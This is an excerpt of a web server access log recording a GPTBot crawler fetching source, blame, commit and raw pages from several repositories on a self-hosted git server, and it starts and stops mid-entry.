AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/docker-compose.yml" +[17/Feb/2026:14:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 202124] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10292] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204061] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10524] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10498] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10073] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 203868] [Gzip 14.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204057] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" +[17/Feb/2026:14:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/status.json" +[17/Feb/2026:14:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10528] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 149554] [Gzip 16.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fapp%2fmodels.py" [Client 74.7.227.38] [Length 20561] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" +[17/Feb/2026:14:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm" +[17/Feb/2026:14:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10398] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm" +[17/Feb/2026:14:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10398] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" +[17/Feb/2026:14:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?files=asset_pilot_docker%2fmain.py" [Client 74.7.227.38] [Length 34479] [Gzip 7.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/main.py" +[17/Feb/2026:14:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2fstatic%2fjs" [Client 74.7.227.38] [Length 54110] [Gzip 9.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js" +[17/Feb/2026:14:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15614] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build" +[17/Feb/2026:14:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15616] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" +[17/Feb/2026:14:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15618] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" +[17/Feb/2026:14:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15590] [Gzip 4.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build" +[17/Feb/2026:14:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" +[17/Feb/2026:14:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" +[17/Feb/2026:14:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11473] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" +[17/Feb/2026:14:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts?display=source" [Client 74.7.227.38] [Length 11500] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" +[17/Feb/2026:14:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" +[17/Feb/2026:14:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10870] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" +[17/Feb/2026:14:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" +[17/Feb/2026:14:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16055] [Gzip 9.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:14:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" +[17/Feb/2026:14:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 74.7.227.38] [Length 11045] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup" +[17/Feb/2026:14:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" +[17/Feb/2026:14:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" +[17/Feb/2026:14:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" [Client 74.7.227.38] [Length 9854] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/status.json" +[17/Feb/2026:14:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" [Client 74.7.227.38] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/status.json" +[17/Feb/2026:14:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" +[17/Feb/2026:14:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9908] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.dgspec.json" +[17/Feb/2026:14:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 74.7.227.38] [Length 9908] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" +[17/Feb/2026:14:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14919] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker" +[17/Feb/2026:14:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/start.sh" [Client 74.7.227.38] [Length 14888] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" +[17/Feb/2026:14:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 74.7.227.38] [Length 9995] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" +[17/Feb/2026:14:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr 